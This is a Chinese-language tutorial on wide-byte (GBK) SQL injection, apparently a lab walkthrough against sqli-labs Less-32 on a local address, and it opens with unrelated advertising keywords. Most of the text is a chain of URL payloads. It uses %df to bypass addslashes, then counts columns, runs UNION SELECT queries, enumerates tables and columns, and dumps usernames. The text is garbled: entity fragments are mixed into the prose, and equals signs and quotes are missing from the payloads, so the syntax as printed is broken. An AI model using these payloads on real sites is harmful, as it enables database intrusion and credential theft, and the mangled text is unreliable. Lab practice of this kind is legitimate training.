企业网站托管排版设计制作,h5网页是什么意思,广告联盟排行榜,网络广告营销案例1.1 宽字节注入原理
宽字节注入#xff0c;在 SQL 进行防注入的时候#xff0c;一般会开启 gpc#xff0c;过滤特殊字符。 一般情况下开启 gpc 是可以防御很多字符串型的注入#xff0c;但是如果数据库编码不 对#xff0c;也可以导致 SQL 防注入绕过#xff0c;达到注入…1.1 宽字节注入原理
宽字节注入在 SQL 进行防注入的时候一般会开启 gpc过滤特殊字符。 一般情况下开启 gpc 是可以防御很多字符串型的注入但是如果数据库编码不 对也可以导致 SQL 防注入绕过达到注入的目的。如果数据库设置宽字节字 符集 gbk 会导致宽字节注入从而逃逸 gpc 前提条件 简单理解:数据库编码与 PHP 编码设置为不同的两个编码那么就有可能产生宽字 节注入 深入讲解要有宽字节注入漏洞首先要满足数据库后端使用双/多字节解析 SQL 语句其次还要保证在该种字符集范围中包含低字节位是 0x5C(01011100) 的字 符初步的测试结果 Big5 和 GBK 字符集都是有的 UTF-8 和 GB2312 没 有这种字符也就不存在宽字节注入。 gpc 绕过过程。
gpc 绕过过程
%df%27(addslashes)%df%5c%27(数据库 GBK)運 1.2 宽字节注入靶场
http://192.168.1.24/sqli-labs/Less-32 1.3 判断注入点
?id1%df and 11--
?id1%df and 12-- 通过页面的回显发现确实存在宽字节注入以及单引号注入点
1.4 使用order by字段数
?id1%df and 11 order by 4--
?id1%df and 11 order by 3-- 字段数为3
1.6 找回显以及爆数据库名
找回显信息收集
?id1%df and 12 union select 1,database(),3-- 1.7 爆数据库表名
爆破数据库表
?id1%df and 12 union select 1,2,group_concat(table_name)from information_schema.tables where table_schemadatabase()-- 1.8 爆破字段
爆破字段内容因为users中单引号会被转义因此采取十六进制代替users
?id-1%df union select 1,2, group_concat(column_name) from information_schema.columns WHERE table_name0x7573657273-- 1.9爆破字段内容
?id-1%df union select 1,2, group_concat(username) from users--